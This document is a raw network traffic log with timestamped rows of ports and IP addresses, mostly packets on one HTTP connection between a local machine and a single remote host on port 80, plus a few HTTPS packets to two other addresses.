Nov 11, 2024 10:33:25.151729107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151736975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151747942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151757956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151765108 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151768923 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151781082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151791096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151797056 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151803017 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151814938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151833057 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151842117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151859045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151859999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151878119 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151890039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151911974 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151931047 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151968956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151979923 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151989937 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152033091 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152132034 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:25.152262926 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:25.152381897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152394056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152424097 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152430058 CET	443	49838	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.152436972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152482033 CET	49838	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.152523041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152534962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152545929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152556896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152561903 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152570009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152581930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152592897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152592897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152605057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152615070 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152616024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152627945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152636051 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152651072 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152668953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152679920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152682066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152693987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152704954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152705908 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152718067 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152719021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152730942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152735949 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152745008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152755022 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152762890 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152767897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152789116 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152808905 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152811050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152836084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152847052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152848005 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152858973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152870893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152873039 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152893066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152898073 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152906895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152918100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152920961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152920961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152930021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152941942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152968884 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.152980089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.152992964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153002977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153003931 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153014898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153022051 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153027058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153038979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153043985 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153068066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153078079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153090000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153095961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153100014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153112888 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153122902 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153125048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153137922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153148890 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153151989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153167963 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153178930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153196096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153197050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153208017 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153218031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153235912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153248072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153251886 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153259039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153271914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153274059 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153283119 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153297901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153306007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153316021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153323889 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153338909 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153345108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153357983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153367996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153367996 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153378963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153388977 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153389931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153402090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153404951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153418064 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153428078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153434992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153439045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153450966 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153454065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153465986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153477907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153480053 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153490067 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153501987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153507948 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153515100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153525114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153526068 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153536081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153537989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153548956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153562069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153573036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153575897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153584003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153598070 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153604031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153609037 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153619051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153629065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153630972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153630972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153640985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153651953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153661966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153667927 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153676033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153685093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.153697014 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153709888 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.153742075 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.154798031 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:25.154807091 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:25.155802011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.155838966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.155846119 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.155883074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157495975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157506943 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157516956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157527924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157538891 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157546997 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157565117 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157577038 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157583952 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157587051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157599926 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157613039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157617092 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157624960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157636881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157636881 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157649040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157659054 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157661915 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157670975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157704115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157716036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157718897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157727957 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157741070 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157751083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157752037 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157763958 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157778978 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157782078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157794952 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157799006 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157826900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157828093 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157839060 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157840967 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157850981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157861948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157869101 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157872915 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157885075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157888889 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157891989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157897949 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157910109 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157915115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157922983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157934904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157943964 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157974005 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157979965 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.157987118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.157987118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158011913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158016920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158024073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158035040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158046007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158061028 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158083916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158094883 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158097029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158109903 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158122063 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158133030 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158134937 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158144951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158145905 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158157110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158169985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158176899 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158190012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158201933 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158209085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158212900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158226967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158235073 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158236980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158250093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158262014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158263922 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158273935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158287048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158297062 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158308983 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158308983 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158332109 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158341885 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158350945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158361912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158370972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158374071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158386946 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158399105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158410072 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158410072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158423901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158435106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158442020 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158452034 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158473015 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158477068 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158485889 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158497095 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158509016 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158513069 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158520937 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158529997 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158531904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158545971 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158555984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158556938 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158574104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158580065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158600092 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158607960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158618927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158627033 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158629894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158643007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158653975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158657074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158674002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158684969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158694983 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158695936 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158708096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158711910 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158734083 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158754110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158761978 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158766031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158778906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158792019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158795118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158804893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158809900 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158816099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158823967 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158828974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158840895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158854008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158854008 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158870935 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158878088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158889055 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158890009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158900976 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158915997 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158931017 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158932924 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158942938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158948898 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158955097 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158967018 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158968925 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158977985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.158983946 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.158989906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159001112 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159006119 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.159012079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159023046 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159033060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.159041882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159054995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159054995 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.159066916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159079075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.159085035 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.159092903 CET	80	49747	185.215.113.206	192.168.2.5
